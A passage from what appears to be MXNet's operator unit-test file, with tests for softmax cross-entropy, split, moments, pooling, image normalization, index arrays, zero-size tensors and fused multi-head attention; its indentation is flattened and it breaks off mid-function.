@with_seed()
def test_softmax_cross_entropy():
def f_sm_ce(data, label):
return np.sum(-np.log(data) * label)
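# With one-hot labels this reduces to the negative log-probability of the true class,
# summed over the batch, which is what softmax_cross_entropy is expected to compute.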
data = mx.sym.Variable('data')
label = mx.sym.Variable('label')
sym = mx.sym.softmax_cross_entropy(data=data, label=label)
num_labels = random.randint(100, 200)
batch_size = random.randint(100, 200)
np_data = rand_ndarray((batch_size, num_labels), stype='default').asnumpy()
np_sm = np_softmax(np_data)
np_label = np.random.randint(0, num_labels, (batch_size, ))
np_one_hot_label = np.zeros((batch_size, num_labels))
np_one_hot_label[np.arange(batch_size), np_label] = 1.
check_symbolic_forward(sym, {'data' : np_data, 'label' : np_label}, [np.array([f_sm_ce(np_sm, np_one_hot_label)])], rtol=1e-3, atol=1e-5)
@with_seed()
def test_split_v2():
dim = random.randint(2, 6)
shape = rand_shape_nd(dim)
axis = random.randint(-dim, dim-1)
axis_size = shape[axis]
samples = random.randint(0, axis_size - 1)
indices = sorted(random.sample([i for i in range(1, axis_size)], samples))
indices = tuple(indices)
mx_data = rand_ndarray(shape)
np_data = mx_data.asnumpy()
np_out = np.split(np_data, indices_or_sections=indices, axis=axis)
data = mx.sym.Variable("data")
sym = mx.sym.split_v2(data, indices_or_sections=indices, axis=axis)
check_symbolic_forward(sym, {"data": mx_data}, np_out, rtol=1e-3, atol=1e-5)
out_grad = [np.ones(arr.shape) for arr in np_out]
check_symbolic_backward(sym, {"data": mx_data}, out_grad, [np.concatenate(out_grad, axis=axis)])
@with_seed()
def test_moments():
dim = random.randint(2, 5)
shape = rand_shape_nd(dim, dim=5)
axes = [i for i in range(dim)]
test_dims = random.sample(axes, random.randint(1, dim))
test_axes = tuple(sorted(test_dims))
np_a = np.random.uniform(-1.0, 1.0, shape)
a = mx.nd.array(np_a)
for keepdims in [True, False]:
eps = 1e-3
np_a[abs(np_a) < eps] = 2 * eps
np_mean = np.mean(np_a, axis=test_axes, keepdims=keepdims)
np_var = np.var(np_a, axis=test_axes, keepdims=keepdims)
mx_mean, mx_var = mx.nd.moments(a, keepdims=keepdims, axes=test_axes)
N = np_a.size / np_mean.size
mx_sym = mx.sym.Variable("data")
mx_moments = mx.sym.moments(mx_sym, axes=test_axes, keepdims=keepdims)
mx_test_sym = mx.sym.elemwise_add(mx_moments[0], mx_moments[1])
if len(np_mean.shape) == 0:
np_mean = np_mean.reshape(mx_mean.shape)
np_var = np_var.reshape(mx_var.shape)
assert np_mean.shape == mx_mean.shape
assert np_var.shape == mx_var.shape
check_symbolic_forward(mx_test_sym, [np_a], [np_mean + np_var], rtol=1e-3, atol=1e-5)
check_numeric_gradient(mx_test_sym, [np_a], numeric_eps=eps, rtol=1e-2, atol=2e-4)
@with_seed()
def test_invalid_kernel_size():
invalid_kernel_size = 28
assert_exception(
mx.nd.Correlation,
MXNetError,
mx.nd.array(np.random.rand(1, 1, 28, 28)),
mx.nd.array(np.random.rand(1, 1, 28, 28)),
kernel_size=invalid_kernel_size)
@with_seed()
def test_valid_kernel_size():
valid_kernel_size = 9
mx.nd.Correlation(
mx.nd.array(np.random.rand(1, 1, 28, 28)),
mx.nd.array(np.random.rand(1, 1, 28, 28)),
kernel_size=valid_kernel_size)
@with_seed()
def test_valid_max_pooling_pad_type_same():
import math
input_data = mx.nd.array(np.random.rand(1,1,10))
stride = 2
kernel = 2
output_data=mx.nd.Pooling(
input_data,
kernel=kernel,
stride=stride,
pad=(0,0,0),
pool_type='max',
name='pooling',
pooling_convention="same")
assert(math.ceil(input_data.shape[2]/stride) == output_data.shape[2])
@with_seed()
def test_invalid_max_pooling_pad_type_same():
import math
input_data = mx.nd.array(np.random.rand(1,1,10))
stride = 2
kernel = 2
pad = 2
assert_exception(
mx.nd.Pooling,
MXNetError,
input_data,
stride=stride,
kernel=kernel,
pad=pad,
pool_type='max',
name='pooling',
pooling_convention="same")
@with_seed()
@pytest.mark.serial
def test_image_normalize():
# Part 1 - Test 3D input with 3D mean/std
shape_3d = (3, 28, 28)
mean = (0, 1, 2)
std = (3, 2, 1)
data_in_3d = mx.nd.random.uniform(0, 1, shape_3d)
data_expected_3d = data_in_3d.asnumpy()
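# Note: for a (C, H, W) numpy array, the chained arr[:][:][k] indexing below is
# equivalent to arr[k], i.e. it selects channel k; normalize applies (x - mean[c]) / std[c]
# per channel.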
data_expected_3d[:][:][0] = data_expected_3d[:][:][0] / 3.0
data_expected_3d[:][:][1] = (data_expected_3d[:][:][1] - 1.0) / 2.0
data_expected_3d[:][:][2] = data_expected_3d[:][:][2] - 2.0
data = mx.symbol.Variable('data')
img_norm_sym = mx.sym.image.normalize(data=data, mean=mean, std=std)
# check forward
check_symbolic_forward(img_norm_sym, [data_in_3d], [data_expected_3d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_3d = np.ones(shape_3d)
grad_expected_3d[:][:][0] = 1 / 3.0
grad_expected_3d[:][:][1] = 1 / 2.0
grad_expected_3d[:][:][2] = 1 / 1.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_3d], out_grads=[mx.nd.ones(shape_3d)],
expected=[grad_expected_3d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_3d], atol=0.001)
# Part 2 - Test 4D input with 3D mean/std
shape_4d = (2, 3, 28, 28)
data_in_4d = mx.nd.random.uniform(0, 1, shape_4d)
data_expected_4d = data_in_4d.asnumpy()
data_expected_4d[0][:][:][0] = data_expected_4d[0][:][:][0] / 3.0
data_expected_4d[0][:][:][1] = (data_expected_4d[0][:][:][1] - 1.0) / 2.0
data_expected_4d[0][:][:][2] = data_expected_4d[0][:][:][2] - 2.0
data_expected_4d[1][:][:][0] = data_expected_4d[1][:][:][0] / 3.0
data_expected_4d[1][:][:][1] = (data_expected_4d[1][:][:][1] - 1.0) / 2.0
data_expected_4d[1][:][:][2] = data_expected_4d[1][:][:][2] - 2.0
# check forward
check_symbolic_forward(img_norm_sym, [data_in_4d], [data_expected_4d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_4d = np.ones(shape_4d)
grad_expected_4d[0][:][:][0] = 1 / 3.0
grad_expected_4d[0][:][:][1] = 1 / 2.0
grad_expected_4d[0][:][:][2] = 1 / 1.0
grad_expected_4d[1][:][:][0] = 1 / 3.0
grad_expected_4d[1][:][:][1] = 1 / 2.0
grad_expected_4d[1][:][:][2] = 1 / 1.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_4d], out_grads=[mx.nd.ones(shape_4d)],
expected=[grad_expected_4d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_4d], atol=0.001)
# Part 3 - Test 3D input with scalar mean/std
shape_3d = (3, 28, 28)
mean = 1.0
std = 2.0
data_in_3d = mx.nd.random.uniform(0, 1, shape_3d)
data_expected_3d = data_in_3d.asnumpy()
data_expected_3d[:][:][:] = (data_expected_3d[:][:][:] - 1.0) / 2.0
data = mx.symbol.Variable('data')
img_norm_sym = mx.sym.image.normalize(data=data, mean=mean, std=std)
# check forward
check_symbolic_forward(img_norm_sym, [data_in_3d], [data_expected_3d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_3d = np.ones(shape_3d)
grad_expected_3d[:][:][:] = 1 / 2.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_3d], out_grads=[mx.nd.ones(shape_3d)],
expected=[grad_expected_3d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_3d], atol=0.001)
# Part 4 - Test 4D input with scalar mean/std
shape_4d = (2, 3, 28, 28)
data_in_4d = mx.nd.random.uniform(0, 1, shape_4d)
data_expected_4d = data_in_4d.asnumpy()
data_expected_4d[:][:][:][:] = (data_expected_4d[:][:][:][:] - 1.0) / 2.0
# check forward
check_symbolic_forward(img_norm_sym, [data_in_4d], [data_expected_4d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_4d = np.ones(shape_4d)
grad_expected_4d[:][:][:][:] = 1 / 2.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_4d], out_grads=[mx.nd.ones(shape_4d)],
expected=[grad_expected_4d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_4d], atol=0.001)
@with_seed()
@pytest.mark.serial
def test_index_array():
def test_index_array_default():
for shape in [(10,), (7, 5, 29), (5, 7, 11, 13, 17, 19)]:
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones(shape)
mgrid = np.mgrid[tuple(slice(0, x) for x in shape)]
expected = np.stack(mgrid, axis=-1)
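# e.g. for shape (2, 3), expected[i, j] == [i, j]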
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_default_zero_dim():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones(())
expected = np.zeros((0,))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_default_zero_size():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones((0, 0, 0))
expected = np.zeros((0, 0, 0, 3))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
def test_index_array_select_axes():
shape = (5, 7, 11, 13, 17, 19)
for axes in [(3,), (4, 1), (5, 1, 3), (-1,), (-5, -1, -3)]:
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data, axes=axes)
input_array = np.ones(shape)
mgrid = np.mgrid[tuple(slice(0, x) for x in shape)]
expected = np.stack(mgrid, axis=-1)[..., axes]
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_select_axes_zero_size():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data, axes=(2, 1))
input_array = np.ones((0, 0, 0, 0))
expected = np.zeros((0, 0, 2))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
test_index_array_default()
test_index_array_default_zero_dim()
test_index_array_default_zero_size()
test_index_array_select_axes()
test_index_array_select_axes_zero_size()
@with_seed()
def test_scalar_tensor_creation():
assertRaises(MXNetError, mx.nd.zeros, shape=())
assertRaises(MXNetError, mx.nd.ones, shape=())
with mx.np_shape():
data_mx = mx.nd.ones(shape=())
data_np = np.ones((), dtype=data_mx.dtype)
assert same(data_mx.asnumpy(), data_np)
@with_seed()
def test_zero_size_tensor_creation():
assertRaises(MXNetError, mx.nd.zeros, shape=(0, 1, 3, 0))
assertRaises(MXNetError, mx.nd.ones, shape=(0, 1, 3, 0))
with mx.np_shape():
data_mx = mx.nd.ones(shape=(0, 1, 0, 4))
data_np = np.ones(shape=data_mx.shape, dtype=data_mx.dtype)
assert same(data_mx.asnumpy(), data_np)
@with_seed()
def test_concat_with_zero_size_tensor():
with mx.np_shape():
data1 = mx.nd.ones((0, 8, 12))
data2 = mx.nd.ones((3, 8, 12))
data3 = mx.nd.ones((0, 8, 12))
ret = mx.nd.Concat(data1, data2, data3, dim=0)
assert ret.shape == (3, 8, 12)
data1 = mx.nd.ones((0, 3, 10))
data2 = mx.nd.ones((0, 4, 10))
data3 = mx.nd.ones((0, 5, 10))
ret = mx.nd.Concat(data1, data2, data3, dim=1)
assert ret.shape == (0, 12, 10)
@with_seed()
def test_np_shape_decorator():
@mx.use_np_shape
def check_scalar_one():
"""Generate scalar one tensor"""
return mx.nd.ones(shape=())
assert check_scalar_one.__name__ == "check_scalar_one"
assert check_scalar_one.__doc__ == "Generate scalar one tensor"
assert check_scalar_one().shape == ()
for active in [True, False]:
with mx.np_shape(active=active):
assert check_scalar_one.__name__ == "check_scalar_one"
assert check_scalar_one.__doc__ == "Generate scalar one tensor"
assert check_scalar_one().shape == ()
@mx.use_np_shape
def check_concat(shape1, shape2, axis):
data1 = mx.nd.ones(shape1)
data2 = mx.nd.ones(shape2)
ret = mx.nd.Concat(data1, data2, dim=axis)
expected_ret = np.concatenate((data1.asnumpy(), data2.asnumpy()), axis=axis)
assert ret.shape == expected_ret.shape
check_concat((0, 3, 4), (5, 3, 4), 0)
check_concat((8, 0, 5), (8, 7, 5), 1)
check_concat((8, 0, 0), (8, 0, 0), 2)
for active in [True, False]:
check_concat((0, 3, 4), (5, 3, 4), 0)
check_concat((8, 0, 5), (8, 7, 5), 1)
check_concat((8, 0, 0), (8, 0, 0), 2)
@with_seed()
def test_add_n():
data_shape = (2, 2)
input_num = 5
data = [mx.nd.random.uniform(shape=data_shape) for i in range(input_num)]
rslt = mx.nd.zeros(shape=data_shape)
for i in range(input_num):
rslt += data[i]
add_n_rslt = mx.nd.add_n(*data, out=data[0])
assert_almost_equal(rslt.asnumpy(), add_n_rslt.asnumpy(), atol=1e-5)
def test_get_all_registered_operators():
ops = get_all_registered_operators()
assert isinstance(ops, list)
assert len(ops) > 0
assert 'Activation' in ops
def test_get_operator_arguments():
operator_arguments = get_operator_arguments('Activation')
assert isinstance(operator_arguments, OperatorArguments)
assert operator_arguments.names == ['data', 'act_type']
assert operator_arguments.types \
== ['NDArray-or-Symbol', "{'relu', 'sigmoid', 'softrelu', 'softsign', 'tanh'}, required"]
assert operator_arguments.narg == 2
def test_transpose_infer_shape_back():
o1 = mx.sym.ones(shape=[2,3])
o2 = mx.sym.ones(shape=[-1,-1])
t = mx.sym.transpose(o2)
b = o1 + t
x = b.bind(mx.cpu(), args={})
y = x.forward()
assert(y[0].shape == (2,3))
def test_transpose_infer_shape_mixed():
o1 = mx.sym.ones(shape=[2,-1])
o2 = mx.sym.ones(shape=[3,-1])
t = mx.sym.transpose(o2)
b = o1 + t
x = b.bind(mx.cpu(), args={})
y = x.forward()
assert(y[0].shape == (2,3))
@with_seed()
def test_sample_normal_default_shape():
# Test case from https://github.com/apache/incubator-mxnet/issues/16135
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]))
assert s.shape == (1,)
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=())
assert s.shape == (1,)
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=1)
assert s.shape == (1, 1)
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=(1,))
assert s.shape == (1, 1)
def test_large_tensor_disabled_err_msg():
LARGE_X = 4300000000
MEDIUM_X = 1000000000
SMALL_Y = 1
shape = (2, LARGE_X)
def check_nd_array():
x = np.arange(0, LARGE_X)
assertRaises(MXNetError, mx.nd.array, x)
def check_nd_ones():
assertRaises(MXNetError, mx.nd.ones, shape)
def check_nd_zeros():
assertRaises(MXNetError, mx.nd.zeros, shape)
def check_nd_full():
val = 1
assertRaises(Exception, mx.nd.full, shape, val)
def check_nd_arange():
start = 0
stop = LARGE_X
assertRaises(Exception, mx.nd.arange, start, stop)
def check_nd_random():
shape = (2, LARGE_X)
def check_random_exp():
lam = 4
assertRaises(MXNetError, mx.nd.random_exponential, lam, shape)
def check_random_gamma():
alpha = 9
beta = 0.5
assertRaises(MXNetError, mx.nd.random_gamma, alpha, beta, shape)
def check_random_normal():
loc = 0
scale = 1
assertRaises(MXNetError, mx.nd.random_normal, loc, scale, shape)
def check_random_poisson():
lam = 4
assertRaises(MXNetError, mx.nd.random_poisson, lam, shape)
def check_random_randint():
low = 0
high = 1000000
assertRaises(MXNetError, mx.nd.random_randint, low, high, shape)
def check_random_uniform():
low = 0
high = 1
assertRaises(MXNetError, mx.nd.random_uniform, low, high, shape)
def check_multihead_attention_selfatt(dtype):
def convert_weight(F, q_weight, k_weight, v_weight, num_heads):
q_weight = F.reshape(q_weight, shape=(num_heads, -1, 0), reverse=True)
k_weight = F.reshape(k_weight, shape=(num_heads, -1, 0), reverse=True)
v_weight = F.reshape(v_weight, shape=(num_heads, -1, 0), reverse=True)
all_weights = F.concat(q_weight, k_weight, v_weight, dim=-2)
all_weights = F.reshape(all_weights, shape=(-1, 0), reverse=True)
return all_weights
def convert_bias(F, q_bias, k_bias, v_bias, num_heads):
q_bias = F.reshape(q_bias, shape=(num_heads, -1))
k_bias = F.reshape(k_bias, shape=(num_heads, -1))
v_bias = F.reshape(v_bias, shape=(num_heads, -1))
all_bias = F.stack(q_bias, k_bias, v_bias, axis=1)
all_bias = F.reshape(all_bias, shape=(-1,))
return all_bias
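# convert_weight/convert_bias pack the separate q/k/v projection parameters into a single
# matrix/vector with per-head [q; k; v] blocks, which (as assumed here) is the layout the
# interleaved_matmul_selfatt_* contrib operators consume from one fused FullyConnected projection.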
batch_size = 2
qkv_length = 7 # length of a sequence
qkv_dim = 9 # dimension of encoding
num_heads = 3 # number of attention head
head_dim = 5 # head size
out_dim = 13 * num_heads
qkv_units = num_heads * head_dim
arg_params = {
'qkv': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'k_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'v_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'k_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'v_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'out_weight': mx.nd.array(np.random.rand(*(out_dim, qkv_units)).astype(dtype) * 0.1, dtype=dtype),
'out_bias': mx.nd.array(np.random.rand(*(out_dim,)).astype(dtype) * 0.1, dtype=dtype),
}
qkv = mx.sym.Variable('qkv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
qkv_weight = convert_weight(mx.sym, q_weight, k_weight, v_weight, num_heads)
qkv_bias = convert_bias(mx.sym, q_bias, k_bias, v_bias, num_heads)
qkv = mx.sym.transpose(qkv, axes=(1, 0, 2))
qkv_proj = mx.sym.FullyConnected(qkv, weight=qkv_weight, bias=qkv_bias, flatten=False,
num_hidden=qkv_units * 3, no_bias=False)
att_score = mx.sym.contrib.interleaved_matmul_selfatt_qk(
qkv_proj, heads=num_heads)
att_score = att_score + sonde
weighted_value = mx.sym.contrib.interleaved_matmul_selfatt_valatt(
qkv_proj, att_score, heads=num_heads)
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.transpose(output, axes=(1, 0, 2))
output = mx.sym.Group([output, att_score])
executor = output.simple_bind(ctx=default_context(),
qkv=(batch_size, qkv_length, qkv_dim),
q_weight=(qkv_units, qkv_dim),
q_bias=(qkv_units,),
k_weight=(qkv_units, qkv_dim),
k_bias=(qkv_units,),
v_weight=(qkv_units, qkv_dim),
v_bias=(qkv_units,),
type_dict={'qkv': dtype,
'q_weight': dtype,
'k_weight': dtype,
'v_weight': dtype,
'q_bias': dtype,
'k_bias': dtype,
'v_bias': dtype,
'sonde': dtype},
grad_req='write', force_rebind=True)
output_shape = executor.outputs[0].shape
output_grads = np.random.rand(*output_shape).astype(dtype) * 0.1
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_opti = executor.outputs[0].asnumpy()
att_score_opti = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype),
mx.nd.zeros(att_score_opti.shape, dtype=dtype)])
grads_opti = {k: v.asnumpy() for k, v in executor.grad_dict.items()}
qkv = mx.sym.Variable('qkv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
q = mx.sym.FullyConnected(qkv, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
k = mx.sym.FullyConnected(qkv, weight=k_weight, bias=k_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
v = mx.sym.FullyConnected(qkv, weight=v_weight, bias=v_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
q = mx.sym.reshape(q, shape=(0, 0, num_heads, -1))
q = mx.sym.transpose(q, axes=(0, 2, 1, 3))
q = mx.sym.reshape(q, shape=(-1, 0, 0), reverse=True)
k = mx.sym.reshape(k, shape=(0, 0, num_heads, -1))
k = mx.sym.transpose(k, axes=(0, 2, 1, 3))
k = mx.sym.reshape(k, shape=(-1, 0, 0), reverse=True)
q = mx.sym.contrib.div_sqrt_dim(q)
att_score = mx.sym.batch_dot(q, k, transpose_b=True)
att_score = att_score + sonde
v = mx.sym.reshape(v, shape=(0, 0, num_heads, -1))
v = mx.sym.transpose(v, axes=(0, 2, 1, 3))
v = mx.sym.reshape(v, shape=(-1, 0, 0), reverse=True)
weighted_value = mx.sym.batch_dot(att_score, v)
weighted_value = mx.sym.reshape(weighted_value, shape=(-1, num_heads, 0, 0),
reverse=True)
weighted_value = mx.sym.transpose(weighted_value, axes=(0, 2, 1, 3))
weighted_value = mx.sym.reshape(weighted_value, shape=(0, 0, -1))
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.Group([output, att_score])
executor = output.simple_bind(ctx=default_context(),
qkv=(batch_size, qkv_length, qkv_dim),
type_dict={'qkv': dtype},
grad_req='write', force_rebind=True)
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_orig = executor.outputs[0].asnumpy()
att_score_orig = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype),
mx.nd.zeros(att_score_orig.shape, dtype=dtype)])
grads_orig = {k : v.asnumpy() for k, v in executor.grad_dict.items()}
assert_allclose(att_score_orig, att_score_opti, rtol=1e-2, atol=1e-3)
assert_allclose(output_orig, output_opti, rtol=1e-2, atol=1e-3)
for k in grads_opti.keys():
assert(grads_orig[k].dtype == grads_opti[k].dtype)
assert(grads_orig[k].shape == grads_opti[k].shape)
assert_allclose(grads_orig[k], grads_opti[k], rtol=1e-2, atol=1e-3)
@with_seed()
@assert_raises_cuda_not_satisfied(min_version='9.1')
@pytest.mark.serial
def test_multihead_attention_selfatt():
dtypes = ['float32']
if default_context().device_type == 'gpu':
dtypes += ['float16']
for dtype in dtypes:
check_multihead_attention_selfatt(dtype=dtype)
def check_multihead_attention_encdec(dtype):
def convert_weight(F, k_weight, v_weight, num_heads):
k_weight = F.reshape(k_weight, shape=(num_heads, -1, 0), reverse=True)
v_weight = F.reshape(v_weight, shape=(num_heads, -1, 0), reverse=True)
all_weights = F.concat(k_weight, v_weight, dim=-2)
all_weights = F.reshape(all_weights, shape=(-1, 0), reverse=True)
return all_weights
def convert_bias(F, k_bias, v_bias, num_heads):
k_bias = F.reshape(k_bias, shape=(num_heads, -1))
v_bias = F.reshape(v_bias, shape=(num_heads, -1))
all_bias = F.stack(k_bias, v_bias, axis=1)
all_bias = F.reshape(all_bias, shape=(-1,))
return all_bias
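# Same per-head packing as in the self-attention check above, except only k and v are fused;
# q is projected separately and passed to interleaved_matmul_encdec_qk.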
batch_size = 2
qkv_length = 7 # length of a sequence
qkv_dim = 9 # dimension of encoding
num_heads = 3 # number of attention heads
head_dim = 5 # head size
out_dim = 13 * num_heads
qkv_units = num_heads * head_dim
arg_params = {
'q': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'kv': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'k_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'v_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'k_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'v_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'out_weight': mx.nd.array(np.random.rand(*(out_dim, qkv_units)).astype(dtype) * 0.1, dtype=dtype),
'out_bias': mx.nd.array(np.random.rand(*(out_dim,)).astype(dtype) * 0.1, dtype=dtype),
}
q = mx.sym.Variable('q')
kv = mx.sym.Variable('kv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
kv_weight = convert_weight(mx.sym, k_weight, v_weight, num_heads)
kv_bias = convert_bias(mx.sym, k_bias, v_bias, num_heads)
kv = mx.sym.transpose(kv, axes=(1, 0, 2))
kv_proj = mx.sym.FullyConnected(kv, weight=kv_weight, bias=kv_bias, flatten=False,
num_hidden=qkv_units * 2, no_bias=False)
q = mx.sym.transpose(q, axes=(1, 0, 2))
q_proj = mx.sym.FullyConnected(q, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
att_score = mx.sym.contrib.interleaved_matmul_encdec_qk(
q_proj, kv_proj, heads=num_heads)
att_score = att_score + sonde
weighted_value = mx.sym.contrib.interleaved_matmul_encdec_valatt(
kv_proj, att_score, heads=num_heads)
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.transpose(output, axes=(1, 0, 2))
output = mx.sym.Group([output, att_score])
executor = output.simple_bind(ctx=default_context(),
q=(batch_size, qkv_length, qkv_dim),
kv=(batch_size, qkv_length, qkv_dim),
q_weight=(qkv_units, qkv_dim),
q_bias=(qkv_units,),
k_weight=(qkv_units, qkv_dim),
k_bias=(qkv_units,),
v_weight=(qkv_units, qkv_dim),
v_bias=(qkv_units,),
out_weight=(out_dim, qkv_units),
out_bias=(out_dim,),
type_dict={'q': dtype,
'kv': dtype,
'q_weight': dtype,
'q_bias': dtype,
'k_weight': dtype,
'k_bias': dtype,
'v_weight': dtype,
'v_bias': dtype,
'out_weight': dtype,
'out_bias': dtype,
},
grad_req='write', force_rebind=True)
output_shape = executor.outputs[0].shape
output_grads = np.random.rand(*output_shape).astype(dtype) * 0.1
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_opti = executor.outputs[0].asnumpy()
att_score_opti = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype), mx.nd.zeros(att_score_opti.shape, dtype=dtype)])
grads_opti = {k: v.asnumpy() for k, v in executor.grad_dict.items()}
q = mx.sym.Variable('q')
kv = mx.sym.Variable('kv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
q = mx.sym.FullyConnected(q, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
k = mx.sym.FullyConnected(kv, weight=k_weight, bias=k_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
v = mx.sym.FullyConnected(kv, weight=v_weight, bias=v_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
q = mx.sym.reshape(q, shape=(0, 0, num_heads, -1))
q = mx.sym.transpose(q, axes=(0, 2, 1, 3))
q = mx.sym.reshape(q, shape=(-1, 0, 0), reverse=True)
k = mx.sym.reshape(k, shape=(0, 0, num_heads, -1))
k = mx.sym.transpose(k, axes=(0, 2, 1, 3))
k = mx.sym.reshape(k, shape=(-1, 0, 0), reverse=True)
q = mx.sym.contrib.div_sqrt_dim(q)
att_score = mx.sym.batch_dot(q, k, transpose_b=True)
att_score = att_score + sonde
v = mx.sym.reshape(v, shape=(0, 0, num_heads, -1))
v = mx.sym.transpose(v, axes=(0, 2, 1, 3))
